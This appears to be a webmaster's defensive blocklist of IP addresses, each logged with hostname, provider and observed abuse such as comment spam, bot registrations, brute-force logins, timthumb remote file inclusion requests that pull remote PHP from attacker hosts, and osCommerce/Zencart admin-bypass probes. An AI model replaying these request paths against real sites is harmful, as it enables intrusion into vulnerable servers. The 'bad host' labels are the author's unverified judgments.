Website server IP: Junk websites – fakeoksunglassespub.net frsaclongchamp1948.net okfakeoakleys.us)
Trackback Spammer
Bad host
192.151.145.24 – 192.151.145.31 Company: United States – Kansas City Zhou Pizhong Bad host
87.242.64.32 see next Hostname: gen22.hs.shared.masterhost.ru
Company: Russian Federation – Moscow .masterhost
Looking for non-existent or restricted files
log.php
doc.php
87.242.64.0 – 87.242.64.255 Company: Russian Federation – Moscow .masterhost Banned Region: Russian Federation
Bad host
87.242.32.0 – 87.242.63.255 Company: Hungary – Miskolc Pr-telecom Rt. Restricted Region: Hungary
Bad host
173.254.28.102 Hostname: just102.justhost.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Looking for .php files
91.232.96.3 see next Company: Germany – Nuremberg Xirra Gmbh Comment Spammer
91.232.96.2 – 91.232.96.40 Company: Germany – Nuremberg Xirra Gmbh Nearly all listed in Project Honeypot as comment spammers
184.168.152.72 Hostname: p3nlhg649.shr.prod.phx3.secureserver.net
Company: United States – Fort Worth Godaddy.com Llc
Looking for WSO2 Framework files:
/wp-content/wso2.php
plugins/wso.php
/57.php
/test2.php
91.219.237.126 see next Hostname: none.0.azar-a.net
Company: Hungary – Budapest Azar-a Kft.
Comment Spammer
91.219.236.0 – 91.219.239.255 Company: Hungary – Budapest Azar-a Kft. Restricted Region: Hungary
173.208.239.114 Company: United States – Boston Wholesale Internet Inc. Repeated activity blocked by firewall
199.48.254.21 Hostname: server.murrisinc.com
Company: United States – Franklin Private Customer
Website server IP: website – weblinkcapital.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Shopo/themify/img_x.php?src=http %3A%2F%2Fflickr.
com.ragepk.com%2Fbad.php
54.234.67.55 Hostname: ec2-54-234-67-55.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Unwanted bot: CCBot/2.0
173.201.196.176 Hostname: p3nlhg343.shr.prod.phx3.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Looking for WSO2 Framework files:
/wp-content/wso2.php
/files/wso2.php
/plugins/wso.php
192.95.12.175 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
195.225.168.119 Hostname: ru000348.widhost.net
Company: Italy – Roma Widestore S.r.l.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
88.208.204.206 Hostname: ps-uk-fh-01.dvmns.com
Company: United Kingdom Gloucester Fast Hosts Ltd
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Over?src=http: //picasa.com.amandas-designs.com/
eva.phpLooking for WordPress xmlrpc.php
198.148.119.236 Hostname: 236-119-148-198-dedicated.multacom.com
Company: United States – Los Angeles Multacom Corporation
Website server IP: Junk website – yuan0217.com
Comment Spammer
91.186.20.11 Hostname: dns1.supremecenter10.co.uk
Company: United Kingdom – Maidenhead Simply Transit Ltd
Website server IP: website – supremecenter10.co.uk
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fflickr.com.
antoniobosano.com%2Fdian.php
85.119.154.41 Hostname: alpha.tdbgraphics.ch
Company: Germany – Platz Virtual Private Servers
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
54.251.150.193 Hostname: ec2-54-251-150-193.ap-southeast-1.compute.amazonaws.com
Company: Singapore – Singapore Amazon.com Inc.
Comment Spammer
192.157.250.34 Hostname: 34.250-157-192.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
Bad host: Chicago Enzu Inc
95.154.195.163 Company: United Kingdom – Maidenhead Iomart Hosting Limited Comment Spammer
Tried to register on restricted site
184.105.235.237
184.105.235.234
Company: United States – Louisville Hurricane Electric Inc. Tried to register on restricted site
Bad host: Louisville Hurricane Electric Inc.
91.237.249.32 see next Company: Russian Federation – Moscow Telecom Tekhpodderzhka Ltd Comment Spammer
91.237.249.0 – 91.237.249.255 Company: Russian Federation – Moscow Telecom Tekhpodderzhka Ltd Banned Region: Russian Federation
151.237.177.16 Company: Netherlands – Deepak Mehta Fie Tried to register on restricted site
Bad host
92.53.96.72 see next Hostname: atlant.timeweb.ru
Company: Russian Federation – Saint Petersburg Ooo Lira-s
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
92.53.96.0 – 92.53.96.255 Company: Russian Federation – Saint Petersburg Ooo Lira-s Banned Region: Russian Federation
37.14.159.7 Hostname: 7.159.14.37.dynamic.jazztel.es
Company: Spain – Madrid Jazz Telecom S.a.
Using extremely long requests in excess of 255 characters
198.57.165.130 Hostname: mak.makemoneywhileyousleep-residualincome.com
Company: United States – Hilliard Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.74.246.68 Company: United States – San Jose Jack Lee
PEG TECH INC
Comment Spammer
198.27.76.111 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
37.59.162.238 Company: France – Roubaix Ovh Systems Comment Spammer
92.86.143.176 Hostname: adsl92-86-143-176.romtelecom.net
Company: Romania – Bucharest Romtelecom S.a.
Linking to CSS files
92.80.0.0 – 92.87.255.255 Company: Romania – Bucharest Romtelecom S.a. Restricted Region: Romania
92.83.49.160 see next Company: Romania – Targu-mures Romtelecom S.a. Tried to register on restricted site (bot)
92.83.48.0 – 92.83.55.255 Company: Romania – Targu-mures Romtelecom S.a. Restricted Region: Romania
184.107.251.74 Hostname: server-10.lorini.net
Company: Canada – Montreal Iweb Technologies Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
94.23.55.217 Hostname: ks301862.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
tried to register on restricted site
82.166.80.231 Hostname: 82-166-80-231.barak-online.net
Company: Israel – Tel Aviv Barak
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Aggregate/timthumb.php?src=
http: //flickr.com.drpier-albrecht.com/cpx.php
93.115.3.99 Company: Romania – Galati Fullshop Srl
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/dg-latest/thumb.php?src=http: //flickr.com.arvyshop.nl/nopart.php
93.115.0.0 – 93.115.3.255 Company: Romania – Galati Fullshop Srl Bad Host
Restricted Region: Romania
5.135.165.126 Hostname: ks301862.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: Junk website – manuali-vdo.pp.ua
DOS attack
This attacker returns regularly hitting a single page hundreds of times
Using referrers:
http: //aoki.moyblog.net/
http: //ukoka.moyblog.net/
http: //odki.moyblog.net/
http: //aliin.moyblog.net/
http: //pilikan.moyblog.net/
130.185.156.168 Company: United States – Newfane Deepak Mehta Fie Comment Spammer
tried to login and create content
37.220.15.146 see next Hostname: h37-220-15-146.host.redstation.co.uk
Company: United Kingdom – Gosport Redstation Limited
Comment Spammer / Trackback Spammer
37.220.15.128 – 37.220.15.191 Company: United Kingdom – Gosport Redstation Limited Bad Host: Redstation Limited
64.31.40.114 Hostname: 114-40-31-64.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer / Trackback Spammer
36.248.161.155 see next Company: China – Putian Putian City Fujian Provincial Network Of Unicom Tried to register on restricted site (bot)
//register.aspx?agree=yes
/index.asp?T=reg
/account/register.php
/logging.php?action=login
/member.php?action=login&mod=logging
/member.php?mod=register
/register.aspx/register.aspx
/registration_rules.asp?FID=0
/reg.asp?reg=reg
36.248.160.0 – 36.248.191.255 Company: China – Putian Putian City Fujian Provincial Network Of Unicom Banned Region: China
37.140.192.89 see next Hostname: server54.hosting.reg.ru
Company: Russian Federation – Moscow Reg.ru Hosting
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/&sa=U&ei=c3yXUYmuC8TeOtO3geAG&ved=0CK0CEBYwWA&usg=
AFQjCNFwsoj2lSyd5OmSkcEF-ztN42-teQ/admin/file_manager.php/login.php
/&sa=U&ei=MgaYUbvlLtSQhQfHpoDIDQ&ved=0CEkQFjAQ&usg=
AFQjCNE1dbS51ULgpKxNIr6Lp0ozIxnrsA/admin/banner_manager.php/login.php
/&sa=U&ei=NAaYUdTdCI2YhQem84CADA&ved=0CCoQFjAGOAo&usg=
AFQjCNHwm19MaA6endfEU719TAJO2bA3Cw/admin/banner_manager.php/login.php
37.140.192.0 – 37.140.195.255 Company: Russian Federation – Moscow Reg.ru Hosting Banned Region: Russian Federation
208.68.36.184 Company: United States – New York City Digital Ocean Inc.
Website server IP: mmpictures.de
Comment Spammer
Found Honeypot trap file
46.21.147.205 Hostname: 205.147.21.46.inferno.name
Company: United States – Chicago Eureka Solutions Sp. Z O.o.
Shared hosting server IP
Spam Harvester
Tried to login/register on restricted site
91.121.165.200 see next Hostname: ks301862.kimsufi.com
Company: France – Paris Ovh Systems
Website server IP: Junk website – manuali-vdo.pp.ua
Remote File Inclusion attempt / WordPress timthumb & uploadify RFI exploit
/theme/default/js/uploadify/uploadify.php
/wp-includes/wp-script.php
/thumb_editor.php
91.121.10.11 see next Hostname: ns23219.ovh.net
Company: France – Paris Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/slider-pro/includes/timthumb/timthumb.php?src=http:
//wordpress.company.myelectronics.by/wp-login.php
91.121.160.0 – 91.121.191.255 Company: France – Paris Ovh Systems Bad Host: Paris Ovh Systems
108.166.79.24 Hostname: 108-166-79-24.static.cloud-ips.com
Company: United States – San Antonio Slicehost
Shared hosting server IP
Image hotlinker
88.190.37.12 Hostname: sd-35270.dedibox.fr
Company: France – Nantes Free Sas
Comment Spammer
204.14.79.194 Company: United States – Tea Areti Internet Llc Comment Spammer
91.207.7.134 see next Hostname: 134.7.207.91.unknown.SteepHost.Net
Company: Ukraine – Kharkiv Pp Andrey Kiselev
Comment Spammer
91.207.4.0 – 91.207.9.255 Company: Ukraine – Kharkiv Pp Andrey Kiselev Banned region: Ukraine
41.249.3.27 see next Company: Morocco – Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Mail server
41.249.0.0 – 41.249.255.255 Company: Morocco – Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Bad host
142.4.100.164 Company: United States – San Jose Fengchen Comment Spammer
Another PEG TECH INC bad IP
94.23.236.99 Hostname: ks308255.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: waza.fr
Comment Spammer
185.25.48.2 Company: Lithuania – Informacines sistemos ir technologijos, UAB Comment Spammer
204.14.79.203 Company: United States – Tea Areti Internet Llc Comment Spammer
198.2.204.77 Company: United States – PEG TECH INC bad IP Comment Spammer
Another PEG TECH INC bad IP
74.208.46.132 Hostname: u16851550.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
95.42.67.174 Hostname: u16851550.onlinehome-server.com
Company: Bulgaria – Sofia Bulgarian Telecommunications Company Plc.
Trying to hotlink to stylesheet
172.245.16.110 Hostname: host.colocrossing.com
Company: ColoCrossing
Tried to register on restricted site (bot)
Incomplete Domain records
62.212.85.119 Hostname: hosted-by.leaseweb.com
Company: Netherlands – Amsterdam Leaseweb B.v.
Website server IP – spam website: oakleyssunglassesfake.com
Tried to register on restricted site (bot)
72.55.168.153 Hostname: cl-t095-233cl.server3.fisgo.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Tried to register on restricted site (bot)
198.46.148.194 Hostname: host.colocrossing.comt
Company: United States – Atlanta New Wave Netconnect Llc
Tried to register on restricted site (bot)
89.111.179.99 Hostname: cf22.hc.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
81.156.80.239 Hostname:host81-156-80-239.range81-156.btcentralplus.com
Company: United Kingdom – Sheffield Bt Public Internet Service
Tried to register on restricted site (bot)
/signup.php
/tiki-register.php
/wikka.php?wakka=UserSettings
/join.php
/register.php
/login.php
199.180.116.210 Company: United States – Scranton Upvps Hosting Comment Spammer
91.236.75.21 Company:Poland – Piekoszow Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Comment Spammer
93.182.157.8 see next Hostname: anon-157-8.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
94.23.55.217 Hostname: ks305471.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
tried to register on restricted site
69.174.87.100 Hostname: 1453ob.scansafe.net
Company: United States – Bangor Scansafe Inc.
looking for non-existent URLS with very long (in excess of 256 characters) strings
74.63.192.13 Hostname: 13-192-63-74.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer / Trackback Spammer
198.200.36.152 Company: United States -Sunnyvale Peg Tech Inc Comment Spammer
83.6.178.2 Hostname: abao2.neoplus.adsl.tpnet.pl
Company: Poland – Warsaw Neostrada Plus
Comment Spammer
80.72.37.156 Hostname: host-156.etop.dev.pl
Company: Poland – Warsaw Neostrada Plus
Comment Spammer
198.56.241.43 Hostname: 43.241-56-198.rdns.scalabledns.com
Company: United States – Los Angeles Enzu Inc
Comment Spammer
50.115.171.231 Company: United States – Kansas City Virpus Networks Comment Spammer
108.163.194.162 Hostname: utility05.sitelock.com
Company: United States – Chicago Singlehop Inc.
Rule Breaker:
UA: SiteLockSpider [en] (WinNT; I ;Nav)
66.135.38.73 Hostname: s1.binarymatters.com
Company: United States – San Antonio Serverbeach
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.95.0.218 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
50.115.170.66 Company: United States – Kansas City Virpus Networks Comment Spammer
198.72.108.53 Company: Canada – Lasalle Iweb Dedicated Ne Comment Spammer
54.251.150.200 Hostname: ks3282742.kimsufi.com
Company: Singapore – Singapore Amazon.com Inc.
Comment Spammer
216.18.208.21 Hostname: smtp.kuwaitiarmy.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
198.2.193.100 Company: United States – PEG TECH INC Comment Spammer
37.59.223.250 Company: France – Roubaix Ovh Systems Trying to register
85.25.255.230 Hostname: triton835.startdedicated.com
Company: Germany – Hurth Intergenia Ag
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quality/superior/scripts/timthumb.php?src=http
%3A%2F%2Fpicasa.com.umadescpjr4.com.br%2Fbad.php
91.121.220.43 Hostname: ks305471.kimsufi.com
Company: France – Roubaix Ovh Systems
Website hosting server IP
Tried to add content: /node/add
Banned Host
190.223.55.66 Company: Peru – Lima America Movil Peru S.a.c. Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
72.167.248.46 Hostname: ip-72-167-248-46.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
185.5.98.243 Hostname: 185-5-98-243.greendata.pl
Company: Poland – Poznan Biznes-host.pl Sp. Z O.o.
Comment Spammer
91.121.27.38 Hostname: ns25033.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/search/thumb.php?src=http: //img.youtube.com.
parsau.cl/youtube.php
/wp-content/themes/Magazine/thumb.php?src=http: //img.youtube.
communication.adrianaraya.cr/wp-login.php
151.237.191.176 Company: United States – Asheville Deepak Mehta Fie Attempting to add content:
[DOAMIN]/node/add
Comment Spammer
192.74.234.76 Company: United States – San Jose Xs Comment Spammer
192.151.145.29 Company: United States – Kansas City Zhou Pizhong WordPress trackback spammer
192.157.250.2 Hostname: 2.250-157-192.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
142.0.129.125 Company: United States – San Jose Peg Tech Inc Comment Spammer
Another PEG TECH INC bad IP
192.80.186.243 Company: United States – Chicago Enzu Inc Comment Spammer
198.2.193.100 Company: United States – Peg Tech Inc Comment Spammer
198.56.241.42 Hostname: 42.241-56-198.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
194.66.232.88 Hostname: crawler02.bl.uk
Company: United Kingdom – London British Library
Rule breaker: ignores robots.txt
User Agent:bl.uk_lddc_bot/3.1.1 (+http: //www.bl.uk/aboutus/legaldeposit/websites
/websites/faqswebmaster/index.html)
157.7.138.136
157.7.138.140
157.7.138.142
Pro-active Ban: 157.7.138.0 – 157.7.138.255
Company: Japan – Tokyo Gmo Internet Inc. Malicious user agent: Python-urllib/2.6
100.42.213.61 Hostname: 100-42-213-61.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
Tried to register
216.18.208.45 Hostname: ns1.thelawofcontract.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
199.204.45.203 Hostname: node-1jfq023.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
37.59.76.161 Company: France – Roubaix Ovh Systems WordPress trackback spammer
76.72.173.229 Company: United States – Philadelphia Database By Design Llc Comment Spammer
216.224.179.80
Hostname: vps-1094534-8977.manage.myhosting.comt
Company: United States – Boxborough Softcom America Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/LightBright/timthumb.php?src=http %3A%2F%2Fpicasa.com.maygunn.no%2Fbad.php
173.193.219.168 Hostname: 173.193.219.168-static.reverse.softlayer.com
Company: United States – Dallas Hosting Services Inc.
Rule breaker / bad bot.
Aboundex/0.2 (http: //www.aboundex.com/crawler/)
Aboundex/0.3 (http: //www.aboundex.com/crawler/)
142.0.128.233 Company: United States – San Jose Jiusutechnology Limited Liability Company
Website hosting server IP:
Comment Spammer
Another PEG TECH INC bad IP
193.107.17.36 Company: Seychelles – Victoria Ideal Solution Ltd
Website hosting server IP:
Trying to login to WordPress with numerous URLs ending /wp-login.php
208.66.59.2 Hostname: mail.bluecliffhosting.com
Company: United States – San Diego Comentum Corp.
Website hosting server IP:
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/modularity/includes/timthumb.php?src=http %3A%2F%2F
picasa.com.awisshipping.com%2Fcache.php
174.136.0.213 Hostname: aileec.com
Company: United States – Dallas Colo4 Llc
Website hosting server IP:
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
66.128.53.125 Hostname: host5.dnns.net
Company: United States – Casper Global Ip Networks Inc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http %3A%2F%2
Fflickr.com.tr.realityinformatica.com%2Fbad.php
198.27.78.206 Company: United States – Newark Ovh Comment Spammer
184.105.235.40 Hostname: blue.oxiascripts.com
Company: United States – Louisville Hurricane Electric Inc.
Comment Spammer
184.7.91.2 Hostname: fl-184-7-91-2.dhcp.embarqhsd.net
Company: United States – Avon Park Embarq Corporation
Comment Spammer
192.74.234.76 Company: United States – San Jose Xs Comment Spammer
Another PEG TECH INC bad IP
50.63.66.91 Hostname: ip-50-63-66-91.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Website hosting server IP:
URL/%22%20onmousedown=%22return%20rwt(this,\’\’,\’\’,\’\’,\’186\’,\’
AFQjCNGnAXwbVSGzHLGCP7havL4Jp2ym8A\’,\’\’,\’0CMgHEBYwVThk\’,\’\’,\’\’,event)%22%3EDon&
and multiple similar requests
37.59.225.38 Company: United States – Roubaix Ovh Systems WordPress trackback spammer
201.249.17.113 Hostname: 201-249-17-113.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
WordPress trackback spammer
69.197.189.4 Company: United States – Kansas City Wholesale Internet Inc Multiple attempts to find login/registration forms with various common URLs
198.204.226.146 Company: United States – Kansas City Zhou Pizhong Multiple attempts to find login/registration forms with various common URLs
72.54.93.181 Company: United States – Fort Worth Cbeyond Communications Llc Brute Force dictionary attack:
/user/login/index.php
Using user names “admin” and “administrator”
50.31.96.11 Hostname: ip11.50-31-96.static.steadfastdns.net
Company: United States – Chicago Steadfast Network
Rule breaker:
Banned User Agents (bots):
ip-web-crawler.com
intelium_bot
62.149.230.50 Hostname: host50-230-149-62.serverdedicati.aruba.it
Company: Italy – Arezzo Aruba S.p.a.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=1laCUZfRCIiO7Qbc0YDwAg&ved=0CFAQFjAQOJAD&usg=
AFQjCNGN5BPB8A8wr6VtuMAqfzK7A1O8WQ/admin/categories.php/login.php
/&sa=U&ei=xVaCUZuMHs-Kswah6oHABg&ved=0CJkBEBYwLw&usg=
AFQjCNEdYGzoa9wfjPGd5xnjyqWiJ_Q-qw/admin/categories.php/login.php
74.111.23.38 Hostname: pool-74-111-23-38.syrcny.fios.verizon.net
Company: United States – Syracuse Verizon Online Llc
Bad bot: MJ12bot – Rule breaker
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
141.8.195.20 Hostname: njerd.from.sh
Company: Russian Federation – Saint Petersburg Sprinthost.ru Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
216.18.208.53 Hostname: www .mrsathawaii.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
100.42.213.2 Hostname: 100-42-213-2.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
209.73.151.217 Company: United States – San Jose Detectnetwork.us Comment Spammer
195.24.65.50 Hostname: web5.r01.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=P3aDUdzNHpGS7AbagYGQBw&ved=0CJABEBYwJQ&usg=
AFQjCNFbJA-XgsEv5cJgwNcGspDlcl_SKA/admin/file_manager.php/login.php
/&sa=U&ei=P3aDUe7zFeuk4ASn6YDADg&ved=0CL4BEBYwOA&usg=
AFQjCNG8Soj1uAiSG1koQwYefikWj07gYA/admin/categories.php/login.php
198.154.213.180 Hostname: dor.doralprint.com
Company: United States – Houston Websitewelcome.com
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/headlines/thumb.php?src=http%3A%2F%2F
propanepressure.com%2Fwp-includes%2Finclude%2Fbad.php
72.167.40.189 Hostname: ip-72-167-40-189.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.221.215.241 Company: United States – Seattle Dme Hosting Llc Trying to login to site with username: eugeniowh / trisha28m
Trying to add content: /node/add
142.4.209.47 Hostname: ks4003193.ip-142-4-209.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Ovh Hosting Inc. again
37.59.251.141 Company: France – Roubaix Ovh Systems Comment Spammer
Banned host: Roubaix Ovh Systems
70.38.52.2 Company: Canada – Montreal Afoi Koutsantoni E.e
Shared hosting server IP
Known Mail server & Dictionary Attacker.Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.131.83.138 Hostname: server.bidstart.com
Company: United States – Greenwich Gary Posner Inc
Website hosting server IP: bidsstart DOT com and similar rubbish websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
168.63.82.21 Company: Ireland – Dublin Microsoft Corp Comment Spammer
69.31.101.8 Company: United States – Torrance Giglinx Inc. Comment Spammer
Bad host: Torrance Giglinx Inc.
37.203.215.107 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register account on restricted site
Dad Host: Deepak Mehta Fie
184.107.167.2 Company:Canada – Montreal Soluciones Empresariales
Shared hosting server IP
Mail Server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL:&amp;sa=U&amp;ei=mLR1UaCyIsvp0QGaiIFw&amp;ved=0CFsQFjAS&amp;usg=
AFQjCNGW6nmtYoh6ptV1E3jff0ksWDn8UQ/admin/banner_manager.php/login.php
174.122.127.34 Hostname: celsior.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Trawling for non-existent URLs
blog/cookie_usage.php
blog/contact_us.php
blog/images/pixel_trans.gif
blog/shopping_cart.phpblog/product_info.php
As well as other page URLs with same /ending as above
69.49.99.104 Hostname: web104c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access non-existent xmlrpc.php
192.95.30.78 Hostname: celsior.websitewelcome.com
Company: Canada – Montreal Ovh Hosting Inc.
Trackback spammer
Seen without valid User Agent.
It’s interesting how often OVH OVH Systems IPs are seen with bad activity
37.59.151.181 Company: France – Roubaix Ovh Systems Comment Spammer
69.49.99.105 Hostname: admin.thelawofcontract.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {URL}/xmlrpc.php
Malicious user agent: libwww-perl/5.835
199.180.131.214 Company: United States – Lawrence Dnsslave.com Comment Spammer
216.18.208.50 Hostname: vps-1099979-10086.manage.myhosting.com
Company: United States – Los Angeles Webnx
Shared hosting server IP
Comment Spammer
192.74.237.57 Company: United States – San Jose Xs Comment Spammer
Bad Host: San Jose Xs – PEG TECH INC
37.72.190.174 Company: United States – Carolina Deepak Mehta Fie Comment Spammer
74.63.192.11
74.63.192.12
Hostname: 12-192-63-74.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer
208.115.125.60 Hostname: sea.xpresservers.com
Company: Pakistan – Okara Private Customer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.phpRemote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/StartWPA/timthumb.php?src=http
%3A%2F%2Fimg.youtube.com.vitryroller.com%2Frahma.php
193.173.27.200 Hostname: www. nl.worldhosting.org
Company: Netherlands – Heemskerk Worldhosting.org Bv
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.200.37.193 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
Bad Host: – PEG TECH INC
67.55.32.100 Hostname: ssd2-n14.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
website server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.154.251.92 Hostname: server.timmsmedia.com
Company: United States – Houston Websitewelcome. com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
&sa=U&ei=k9B5UavtL4aP7AbspoGACw&ved=0CGEQFjAX&usg=
AFQjCNFmsEtsCfEr_NKwE1GSVbg4Kaideg/admin/file_manager.php/login.php
/&sa=U&ei=k9B5UZvpKMivPJK1gZAK&ved=0CGEQFjAX&usg=
AFQjCNFmB0_MkB4CjFfmflnTDPoH1h7Djg/admin/categories.php/login.phpFaked User Agent
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
server.timmsmedia.com is not a Googlebot domain/hostname.
157.56.93.51 Bingbot Rule breaker: ignores robots.txt
216.224.176.234 Hostname: vps-1099979-10086.manage.myhosting.com
Company: United States – Jamaica Plain Softcom America Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.189.235 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register on restricted site
69.49.99.104 Hostname: web104c10.megawebservers.com
